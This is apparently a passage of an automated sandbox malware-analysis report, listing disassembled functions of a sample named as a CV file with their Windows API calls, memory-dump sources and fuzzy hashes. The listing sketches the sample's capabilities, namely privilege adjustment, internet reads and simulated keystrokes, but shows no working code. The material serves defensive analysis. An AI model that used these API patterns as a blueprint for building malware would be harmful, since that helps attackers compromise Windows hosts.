                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                            • API String ID: 0-1546025612
                                                                                            • Opcode ID: 343b41b3efa3d96040d15822a7b1b3d4062f0378f4436ea8556508255475d26e
                                                                                            • Instruction ID: e4a1f776727e5ec8c170b117f132332ae2c34d240867fe5a8110d4cbdec1fb1c
                                                                                            • Opcode Fuzzy Hash: 343b41b3efa3d96040d15822a7b1b3d4062f0378f4436ea8556508255475d26e
                                                                                            • Instruction Fuzzy Hash: E092AD71E0521ACBDF74CF58C884BADB7B1BB55314F2481AEE81AAB290D7709D81CF91
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,000DE014,75920AE0,000DDEF1,0015DC38,?,?), ref: 000DE02C
                                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 000DE03E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProc
                                                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                            • API String ID: 2574300362-192647395
                                                                                            • Opcode ID: 7576ffabede674fdcdb368f5328c1bc81e84b5f435b6a88674778d104cf42305
                                                                                            • Instruction ID: a9a53caedba4f67c6c76edc06843e31210aae7e5c136722efb4bb4d1b32d3349
                                                                                            • Opcode Fuzzy Hash: 7576ffabede674fdcdb368f5328c1bc81e84b5f435b6a88674778d104cf42305
                                                                                            • Instruction Fuzzy Hash: 36D0A7345007129FCB315F60FC086127AE4AB01700F18841AE885D26A0DBB4C8C1C770
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 001013DC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlen
                                                                                            • String ID: ($|
                                                                                            • API String ID: 1659193697-1631851259
                                                                                            • Opcode ID: c7f146279845032412c1be7bb51dcb5b44d899e9771cfff72df53995aef9ff0e
                                                                                            • Instruction ID: 0d1e6529f720abd0b8f1d81138fdfb41c40e01dcbf51dfa082f55ede65c00dd7
                                                                                            • Opcode Fuzzy Hash: c7f146279845032412c1be7bb51dcb5b44d899e9771cfff72df53995aef9ff0e
                                                                                            • Instruction Fuzzy Hash: F2321675A00705AFC728CF69C4809AAB7F0FF48310B55C56EE59ADB3A2E7B4E941CB44
                                                                                            APIs
                                                                                              • Part of subcall function 000DB34E: GetWindowLongW.USER32(?,000000EB), ref: 000DB35F
                                                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 000DB22F
                                                                                              • Part of subcall function 000DB55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 000DB5A5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Proc$LongWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2749884682-0
                                                                                            • Opcode ID: 0615296b8ae4aaf60f9173f3d59382a3857fb6f91a55db8611bab5747b91fd03
                                                                                            • Instruction ID: ae2a33de3466faa7157ed00a03ff6a5d0959e3e45aea668622647e019314f679
                                                                                            • Opcode Fuzzy Hash: 0615296b8ae4aaf60f9173f3d59382a3857fb6f91a55db8611bab5747b91fd03
                                                                                            • Instruction Fuzzy Hash: 48A14772114305FADB386B6A5C88EBF39ECEB66350F52412FF401D27D2DB249D12A272
                                                                                            APIs
                                                                                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,001143BF,00000000), ref: 00114FA6
                                                                                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00114FD2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Internet$AvailableDataFileQueryRead
                                                                                            • String ID:
                                                                                            • API String ID: 599397726-0
                                                                                            • Opcode ID: 58b45928c279954329833586c54a2e26ad7ae30b0142c6f776e3793c5d670982
                                                                                            • Instruction ID: 3524dc6e324a0d8b82cd48883199de984af9528cd13c746c09a2891c8a0e0626
                                                                                            • Opcode Fuzzy Hash: 58b45928c279954329833586c54a2e26ad7ae30b0142c6f776e3793c5d670982
                                                                                            • Instruction Fuzzy Hash: E041C87150460AFFEB28DE94DC85EFB77BDEB80758F10403AF605A6281D7719E8196A0
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0010E20D
                                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0010E267
                                                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0010E2B4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorMode$DiskFreeSpace
                                                                                            • String ID:
                                                                                            • API String ID: 1682464887-0
                                                                                            • Opcode ID: 636fcf70c527e65b2cd492f5b6f28b84223924279d4d00080f14d8061d6fdcc8
                                                                                            • Instruction ID: 0754aa61085e59ea6f985959bd5c2dd53a0f2ec5b5017f30fb99cc295903d5e6
                                                                                            • Opcode Fuzzy Hash: 636fcf70c527e65b2cd492f5b6f28b84223924279d4d00080f14d8061d6fdcc8
                                                                                            • Instruction Fuzzy Hash: 29215E35A00218EFCB00DFA5D884EEDFBB8FF59310F0484A9E945A7351DB319945CB50
                                                                                            APIs
                                                                                              • Part of subcall function 000DF4EA: std::exception::exception.LIBCMT ref: 000DF51E
                                                                                              • Part of subcall function 000DF4EA: __CxxThrowException@8.LIBCMT ref: 000DF533
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000FB180
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000FB1AD
                                                                                            • GetLastError.KERNEL32 ref: 000FB1BA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                            • String ID:
                                                                                            • API String ID: 1922334811-0
                                                                                            • Opcode ID: ffd04cac50dcedeb10d5f56545ce7adf57a42a1af55997d7b1b9e0a6a9506025
                                                                                            • Instruction ID: 43df2f0a7d4062cc79da8dab5a97f41fa4aab7c76a7b68e97fbf0924b4b89e35
                                                                                            • Opcode Fuzzy Hash: ffd04cac50dcedeb10d5f56545ce7adf57a42a1af55997d7b1b9e0a6a9506025
                                                                                            • Instruction Fuzzy Hash: DA11B8B2500309AFE728AF64EC86D7BB7BCFB44310B20852EF15697651EB70FC418A60
                                                                                            APIs
                                                                                            • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00106623
                                                                                            • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00106664
                                                                                            • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0010666F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                                                            • String ID:
                                                                                            • API String ID: 33631002-0
                                                                                            • Opcode ID: b033549bc678174fb05b3c30998035689e301c02116c2c216eb0ad2ba8afb60a
                                                                                            • Instruction ID: 8c8a6afad75fd08dd240f5d596c60a832cadbb34cad4cb807f6696abc769cd2c
                                                                                            • Opcode Fuzzy Hash: b033549bc678174fb05b3c30998035689e301c02116c2c216eb0ad2ba8afb60a
                                                                                            • Instruction Fuzzy Hash: 4E111EB5E01228BFDB118FA5EC45BAEBBBCEB45B10F108156F900E6290D7B15A058BA5
                                                                                            APIs
                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00107223
                                                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0010723A
                                                                                            • FreeSid.ADVAPI32(?), ref: 0010724A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                            • String ID:
                                                                                            • API String ID: 3429775523-0
                                                                                            • Opcode ID: c2790f65a32e0a4fd4c6b0fc7737c25933f2c3dc254b9fd2a74e81837d9b7381
                                                                                            • Instruction ID: dd7c7ee23407af51dee38a0cdef84bbd002d5ae023c48efebcd5f216218631e4
                                                                                            • Opcode Fuzzy Hash: c2790f65a32e0a4fd4c6b0fc7737c25933f2c3dc254b9fd2a74e81837d9b7381
                                                                                            • Instruction Fuzzy Hash: 93F01D7AA04209BFDF04DFE4DD89AEEBBB8EF09201F104469B606E3591E3709A448B10
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0010F599
                                                                                            • FindClose.KERNEL32(00000000), ref: 0010F5C9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileFirst
                                                                                            • String ID:
                                                                                            • API String ID: 2295610775-0
                                                                                            • Opcode ID: 4eb7d0c6119f3f63b78b3ef915d7d912d8efb40873beefc1d98ac138f7327188
                                                                                            • Instruction ID: 68f6468197680af13aeaa65ea096fff58c296dcd2ebab1d7cb71ab1207d7426a
                                                                                            • Opcode Fuzzy Hash: 4eb7d0c6119f3f63b78b3ef915d7d912d8efb40873beefc1d98ac138f7327188
                                                                                            • Instruction Fuzzy Hash: 9A11C4316002009FDB10EF28D845A6EF3E8FF95324F00895EF8A5D7391CB70AD018B95
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0011BE6A,?,?,00000000,?), ref: 0010CEA7
                                                                                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0011BE6A,?,?,00000000,?), ref: 0010CEB9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFormatLastMessage
                                                                                            • String ID:
                                                                                            • API String ID: 3479602957-0
                                                                                            • Opcode ID: 9bf632bfc785664bb809c4d69fc1676d34b265e0290ed3d844eaa820f6d13dd9
                                                                                            • Instruction ID: 71d9d1cab33ef7675bcbfcb868264b2d923bd6a6a1f43b2774681dd962cfdce7
                                                                                            • Opcode Fuzzy Hash: 9bf632bfc785664bb809c4d69fc1676d34b265e0290ed3d844eaa820f6d13dd9
                                                                                            • Instruction Fuzzy Hash: 57F08275100229ABDB109FA4DC49FEF776DBF09351F004165F919D6191D7709A40CBA0
                                                                                            APIs
                                                                                            • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00104153
                                                                                            • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00104166
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: InputSendkeybd_event
                                                                                            • String ID:
                                                                                            • API String ID: 3536248340-0
                                                                                            • Opcode ID: 8cf6552d86644850cb8c9526bda911375237bcefce5caad227447874801a46fd
                                                                                            • Instruction ID: f28ddf5dbdbda27f6c69120c884486d951ca7fc23b35cf91150e01ccb5f2ad1d
                                                                                            • Opcode Fuzzy Hash: 8cf6552d86644850cb8c9526bda911375237bcefce5caad227447874801a46fd
                                                                                            • Instruction Fuzzy Hash: 09F06D7490424DAFDF058FA0D805BBE7BB0EF04305F048009F9659A1A1D7B996529FA0
                                                                                            APIs
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000FACC0), ref: 000FAB99
                                                                                            • CloseHandle.KERNEL32(?,?,000FACC0), ref: 000FABAB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                                                            • String ID:
                                                                                            • API String ID: 81990902-0
                                                                                            • Opcode ID: 6b1aa3c51808ac8c483b6f1d4c43b9fb3d8aecbc6c6d78b3fcd625fd3d882337
                                                                                            • Instruction ID: cc05c6bdacecffddd0937443ca224ba2abe90235013c316b0bbff9576bf560af
                                                                                            • Opcode Fuzzy Hash: 6b1aa3c51808ac8c483b6f1d4c43b9fb3d8aecbc6c6d78b3fcd625fd3d882337
                                                                                            • Instruction Fuzzy Hash: E3E0E675000611AFEB252F54FC05DB777E9EF05320710C429F95A81975DB626CD0DB50
                                                                                            APIs
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,000E6DB3,-0000031A,?,?,00000001), ref: 000E81B1
                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 000E81BA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                            • String ID:
                                                                                            • API String ID: 3192549508-0
                                                                                            • Opcode ID: 4f6f829ba2dd97fe57497fddc6afa660e0fb2eb0c8043f8310e9d2bbdc001993
                                                                                            • Instruction ID: 3c1173f504026513cd77c3c1c537d461f7aba6b8976580ce1ea791ab1fce40a3
                                                                                            • Opcode Fuzzy Hash: 4f6f829ba2dd97fe57497fddc6afa660e0fb2eb0c8043f8310e9d2bbdc001993
                                                                                            • Instruction Fuzzy Hash: 43B092B5144608ABDF002FA1FC0AB587FA8FB0AA52F008010F60D448718B7254908AA2
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: _memmove
                                                                                            • String ID:
                                                                                            • API String ID: 4104443479-0
                                                                                            • Opcode ID: 4059cf0b5c5835ccae9f65321a6194ba6f47170b764ba663cdbb0f98c57440db
                                                                                            • Instruction ID: 71dc15900256ed2de5a01c8b498ac7b3b188e7c85a1fec07f22ad9220421f15c
                                                                                            • Opcode Fuzzy Hash: 4059cf0b5c5835ccae9f65321a6194ba6f47170b764ba663cdbb0f98c57440db
                                                                                            • Instruction Fuzzy Hash: 48A21974A04219DFDB24CF58C480BADBBB1BF58314F2581A9E859AB3A1D7349E81DF90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4d909d435e3e22ee98aa17a39ca6162742eb3360a51bbce2498f36e57764352f
                                                                                            • Instruction ID: 76879f245c90659f28ba4f967ad7de6e162f7a4ed0f8e35d991ff016aab5abec
                                                                                            • Opcode Fuzzy Hash: 4d909d435e3e22ee98aa17a39ca6162742eb3360a51bbce2498f36e57764352f
                                                                                            • Instruction Fuzzy Hash: F1320222D29F418DD7239635DC22335A688EFB73D5F15D727E819B9EAAEB29C4C34100
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: __itow__swprintf
                                                                                            • String ID:
                                                                                            • API String ID: 674341424-0
                                                                                            • Opcode ID: 64cb5d09fc47e3dd633e947aa12d0f5ac799f97d33d3f8d2ad4cf489a0a100fc
                                                                                            • Instruction ID: cc54ec1757be4a066b1b293741b3f82fff983051c70e990af7d2722c244358e7
                                                                                            • Opcode Fuzzy Hash: 64cb5d09fc47e3dd633e947aa12d0f5ac799f97d33d3f8d2ad4cf489a0a100fc
                                                                                            • Instruction Fuzzy Hash: 502266716083019FD724DF24C895FAFB7E5AF84314F10492EF89A9B292DB71E944CB92
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
